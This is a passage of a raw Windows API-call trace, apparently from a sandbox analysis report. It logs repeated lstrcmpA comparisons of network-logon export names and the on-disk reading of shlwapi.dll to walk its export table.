lpString2="DsValidateSubnetNameA") returned 1 [0132.538] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsValidateSubnetNameW") returned 1 [0132.538] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserDebugCall") returned 1 [0132.539] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserDebugTrace") returned 1 [0132.539] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0132.539] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryOtherDomains") returned 1 [0132.539] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryStatistics") returned 1 [0132.539] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserResetNetlogonState") returned 1 [0132.539] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserResetStatistics") returned 1 [0132.539] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserServerEnum") returned 1 [0132.539] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserSetNetlogonState") returned 1 [0132.539] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0132.539] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetAccountDeltas") returned 1 [0132.539] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetAccountSync") returned 1 [0132.539] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetChainSetClientAttributes") returned 1 [0132.539] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetChainSetClientAttributes2") returned 1 [0132.539] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseDeltas") returned 1 [0132.539] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseRedo") returned 1 [0132.539] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseSync") returned 1 [0132.539] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseSync2") returned 1 [0132.539] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDfsGetVersion") returned 1 [0132.539] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDfsIsThisADomainName") returned 1 [0132.539] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetGetDCList") returned 1 [0132.539] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetGetForestTrustInformation") returned 1 [0132.539] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonControl") returned 1 [0132.539] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonControl2") returned 1 [0132.539] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonGetDomainInfo") returned 1 [0132.539] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogoff") returned 1 [0132.539] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogon") returned 1 [0132.539] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogonEx") returned 1 [0132.539] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0132.539] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSendToSam") returned 1 [0132.539] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonUasLogoff") returned 1 [0132.540] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonUasLogon") returned 1 [0132.540] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate") returned 1 [0132.540] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate2") returned 1 [0132.540] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate3") returned 1 [0132.540] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerGetTrustInfo") returned 1 [0132.540] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordGet") returned 1 [0132.540] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordSet") returned 1 [0132.540] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordSet2") returned 1 [0132.540] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerReqChallenge") returned 1 [0132.540] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerSetServiceBits") returned 1 [0132.540] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0132.540] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0132.540] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetlogonComputeClientDigest") returned 1 [0132.540] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetlogonComputeServerDigest") returned 1 [0132.540] lstrcmpA (lpString1="NetAccessAdd", lpString2="NetAccessAdd") returned 0 [0132.540] lstrcmpA (lpString1="NetAccessDel", lpString2="DavAddConnection") returned 1 [0132.540] lstrcmpA (lpString1="NetAccessDel", lpString2="DavDeleteConnection") returned 1 [0132.540] lstrcmpA (lpString1="NetAccessDel", lpString2="DavFlushFile") returned 1 [0132.540] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetExtendedError") returned 1 [0132.540] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetHTTPFromUNCPath") returned 1 [0132.540] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetUNCFromHTTPPath") returned 1 [0132.540] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesA") returned 1 [0132.540] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesExA") returned 1 [0132.540] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesExW") returned 1 [0132.540] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesW") returned 1 [0132.540] lstrcmpA (lpString1="NetAccessDel", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0132.540] lstrcmpA (lpString1="NetAccessDel", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0132.540] lstrcmpA (lpString1="NetAccessDel", lpString2="DsEnumerateDomainTrustsA") returned 1 [0132.540] lstrcmpA (lpString1="NetAccessDel", lpString2="DsEnumerateDomainTrustsW") returned 1 [0132.540] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcCloseW") returned 1 [0132.540] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameA") returned 1 [0132.540] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameW") returned 1 [0132.540] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameWithAccountA") returned 1 [0132.541] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameWithAccountW") returned 1 [0132.541] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNextA") returned 1 [0132.541] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNextW") returned 1 [0132.541] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcOpenA") returned 1 [0132.541] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcOpenW") returned 1 [0132.541] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcSiteCoverageA") returned 1 [0132.541] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcSiteCoverageW") returned 1 [0132.541] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetForestTrustInformationW") returned 1 [0132.541] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetSiteNameA") returned 1 [0132.541] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetSiteNameW") returned 1 [0132.541] lstrcmpA (lpString1="NetAccessDel", lpString2="DsMergeForestTrustInformationW") returned 1 [0132.541] lstrcmpA (lpString1="NetAccessDel", lpString2="DsRoleFreeMemory") returned 1 [0132.541] lstrcmpA (lpString1="NetAccessDel", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0132.541] lstrcmpA (lpString1="NetAccessDel", lpString2="DsValidateSubnetNameA") returned 1 [0132.541] lstrcmpA (lpString1="NetAccessDel", lpString2="DsValidateSubnetNameW") returned 1 [0132.541] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserDebugCall") returned 1 [0132.541] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserDebugTrace") returned 1 [0132.541] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0132.541] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryOtherDomains") returned 1 [0132.541] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryStatistics") returned 1 [0132.541] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserResetNetlogonState") returned 1 [0132.541] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserResetStatistics") returned 1 [0132.541] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserServerEnum") returned 1 [0132.541] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserSetNetlogonState") returned 1 [0132.541] lstrcmpA (lpString1="NetAccessDel", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0132.541] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetAccountDeltas") returned 1 [0132.541] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetAccountSync") returned 1 [0132.541] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetChainSetClientAttributes") returned 1 [0132.541] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetChainSetClientAttributes2") returned 1 [0132.541] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseDeltas") returned 1 [0132.541] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseRedo") returned 1 [0132.541] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseSync") returned 1 [0132.542] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseSync2") returned 1 [0132.542] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDfsGetVersion") returned 1 [0132.542] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDfsIsThisADomainName") returned 1 [0132.542] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetGetDCList") returned 1 [0132.542] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetGetForestTrustInformation") returned 1 [0132.542] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonControl") returned 1 [0132.710] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonControl2") returned 1 [0132.710] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonGetDomainInfo") returned 1 [0132.710] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogoff") returned 1 [0132.710] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogon") returned 1 [0132.710] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogonEx") returned 1 [0132.710] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0132.710] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSendToSam") returned 1 [0132.710] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonUasLogoff") returned 1 [0132.710] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonUasLogon") returned 1 [0132.710] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate") returned 1 [0132.710] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate2") returned 1 [0132.710] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate3") returned 1 [0132.710] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerGetTrustInfo") returned 1 [0132.710] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordGet") returned 1 [0132.710] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordSet") returned 1 [0132.710] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordSet2") returned 1 [0132.710] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerReqChallenge") returned 1 [0132.710] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerSetServiceBits") returned 1 [0132.710] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0132.710] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0132.710] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetlogonComputeClientDigest") returned 1 [0132.710] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetlogonComputeServerDigest") returned 1 [0132.711] lstrcmpA (lpString1="NetAccessDel", lpString2="NetAccessAdd") returned 1 [0132.711] lstrcmpA (lpString1="NetAccessDel", lpString2="NetAccessDel") returned 0 [0132.711] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavAddConnection") returned 1 [0132.711] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavDeleteConnection") returned 1 [0132.711] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavFlushFile") returned 1 [0132.711] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetExtendedError") returned 1 [0132.711] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetHTTPFromUNCPath") returned 1 [0132.711] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetUNCFromHTTPPath") returned 1 [0132.711] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesA") returned 1 [0132.711] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesExA") returned 1 [0132.711] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesExW") returned 1 [0132.711] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesW") returned 1 [0132.711] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0132.711] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0132.711] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsEnumerateDomainTrustsA") returned 1 [0132.711] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsEnumerateDomainTrustsW") returned 1 [0132.711] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcCloseW") returned 1 [0132.711] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameA") returned 1 [0132.711] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameW") returned 1 [0132.711] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameWithAccountA") returned 1 [0132.711] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameWithAccountW") returned 1 [0132.711] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNextA") returned 1 [0132.711] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNextW") returned 1 [0132.711] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcOpenA") returned 1 [0132.711] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcOpenW") returned 1 [0132.711] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcSiteCoverageA") returned 1 [0132.711] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcSiteCoverageW") returned 1 [0132.711] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetForestTrustInformationW") returned 1 [0132.712] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetSiteNameA") returned 1 [0132.712] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetSiteNameW") returned 1 [0132.712] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsMergeForestTrustInformationW") returned 1 [0132.712] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsRoleFreeMemory") returned 1 [0132.712] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0132.712] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsValidateSubnetNameA") returned 1 [0132.712] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsValidateSubnetNameW") returned 1 [0132.712] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserDebugCall") returned 1 [0132.712] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserDebugTrace") returned 1 [0132.712] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0132.712] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryOtherDomains") returned 1 [0132.712] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryStatistics") returned 1 [0132.712] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserResetNetlogonState") returned 1 [0132.712] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserResetStatistics") returned 1 [0132.712] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserServerEnum") returned 1 [0132.712] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserSetNetlogonState") returned 1 [0132.712] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0132.712] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetAccountDeltas") returned 1 [0132.712] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetAccountSync") returned 1 [0132.712] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetChainSetClientAttributes") returned 1 [0132.712] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetChainSetClientAttributes2") returned 1 [0132.712] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseDeltas") returned 1 [0132.712] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseRedo") returned 1 [0132.712] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseSync") returned 1 [0132.712] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseSync2") returned 1 [0132.712] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDfsGetVersion") returned 1 [0132.712] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDfsIsThisADomainName") returned 1 [0132.712] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetGetDCList") returned 1 [0132.712] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetGetForestTrustInformation") returned 1 [0132.712] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonControl") returned 1 [0132.713] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonControl2") returned 1 [0132.713] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonGetDomainInfo") returned 1 [0132.713] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogoff") returned 1 [0132.713] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogon") returned 1 [0132.713] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogonEx") returned 1 [0132.713] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0132.713] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSendToSam") returned 1 [0132.713] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonUasLogoff") returned 1 [0132.713] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonUasLogon") returned 1 [0132.713] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate") returned 1 [0132.713] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate2") returned 1 [0132.713] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate3") returned 1 [0132.713] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerGetTrustInfo") returned 1 [0132.713] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordGet") returned 1 [0132.713] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordSet") returned 1 [0132.713] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordSet2") returned 1 [0132.713] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerReqChallenge") returned 1 [0132.713] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerSetServiceBits") returned 1 [0132.713] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0132.713] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0132.713] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetlogonComputeClientDigest") returned 1 [0132.713] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetlogonComputeServerDigest") returned 1 [0132.713] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessAdd") returned 1 [0132.713] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessDel") returned 1 [0132.714] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessEnum") returned 0 [0132.714] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavAddConnection") returned 1 [0132.714] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavDeleteConnection") returned 1 [0132.714] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavFlushFile") returned 1 [0132.714] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetExtendedError") returned 1 [0132.714] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetHTTPFromUNCPath") returned 1 [0132.714] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetUNCFromHTTPPath") returned 1 [0132.714] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesA") returned 1 [0132.714] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesExA") returned 1 [0132.714] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesExW") returned 1 [0132.717] GetProcessHeap () returned 0x460000 [0132.717] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2cb5030 | out: hHeap=0x460000) returned 1 [0132.717] GetProcessHeap () returned 0x460000 [0132.717] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x10) returned 0x4792f0 [0132.717] LoadLibraryA (lpLibFileName="Shlwapi.dll") returned 0x7ffc5e7b0000 [0132.717] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0132.717] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0132.718] GetModuleFileNameA (in: hModule=0x7ffc5e7b0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")) returned 0x1f [0132.718] CreateFileA (lpFileName="C:\\Windows\\system32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0132.718] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0132.718] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0132.718] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=332104) returned 1 [0132.718] GetProcessHeap () returned 0x460000 [0132.718] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x51148) returned 0x2cb5030 [0132.718] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0132.718] ReadFile (in: hFile=0x17c, lpBuffer=0x2cb5030, nNumberOfBytesToRead=0x51148, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2cb5030*, lpNumberOfBytesRead=0x14f5a4*=0x51148, lpOverlapped=0x0) returned 1 [0132.722] CloseHandle (hObject=0x17c) returned 1 [0132.722] lstrcmpA (lpString1="AssocCreate", lpString2="AssocCreate") returned 0 [0132.722] lstrcmpA (lpString1="AssocGetPerceivedType", lpString2="AssocCreate") returned 1 [0132.722] lstrcmpA (lpString1="AssocGetPerceivedType", lpString2="AssocGetPerceivedType") returned 0 [0132.722] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocCreate") returned 1 [0132.722] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocGetPerceivedType") returned 1 [0132.722] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocIsDangerous") returned 0 [0132.722] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocCreate") returned 1 [0132.722] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocGetPerceivedType") returned 1 [0132.722] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocIsDangerous") returned 1 [0132.722] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocQueryKeyA") returned 0 [0132.722] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocCreate") returned 1 [0132.722] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocGetPerceivedType") returned 1 [0132.722] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocIsDangerous") returned 1 [0132.722] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocQueryKeyA") returned 1 [0132.722] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocQueryKeyW") returned 0 [0132.722] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocCreate") returned 1 [0132.723] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocGetPerceivedType") returned 1 [0132.723] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocIsDangerous") returned 1 [0132.723] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryKeyA") returned 1 [0132.723] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryKeyW") returned 1 [0132.723] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryStringA") returned 0 [0132.723] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocCreate") returned 1 [0132.723] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocGetPerceivedType") returned 1 [0132.723] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocIsDangerous") returned 1 [0132.723] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryKeyA") returned 1 [0132.723] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryKeyW") returned 1 [0132.723] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryStringA") returned 1 [0132.723] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryStringByKeyA") returned 0 [0132.723] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocCreate") returned 1 [0132.723] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocGetPerceivedType") returned 1 [0132.723] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocIsDangerous") returned 1 [0132.723] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryKeyA") returned 1 [0132.723] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryKeyW") returned 1 [0132.723] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringA") returned 1 [0132.723] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringByKeyA") returned 1 [0132.723] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringByKeyW") returned 0 [0132.723] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocCreate") returned 1 [0132.724] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocGetPerceivedType") returned 1 [0132.724] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocIsDangerous") returned 1 [0132.724] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryKeyA") returned 1 [0132.724] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryKeyW") returned 1 [0132.724] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringA") returned 1 [0132.724] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringByKeyA") returned 1 [0132.724] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringByKeyW") returned 1 [0132.724] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringW") returned 0 [0132.724] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocCreate") returned 1 [0132.724] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocGetPerceivedType") returned 1 [0132.724] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocIsDangerous") returned 1 [0132.724] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryKeyA") returned 1 [0132.724] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryKeyW") returned 1 [0132.724] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringA") returned 1 [0132.724] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringByKeyA") returned 1 [0132.724] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringByKeyW") returned 1 [0132.724] 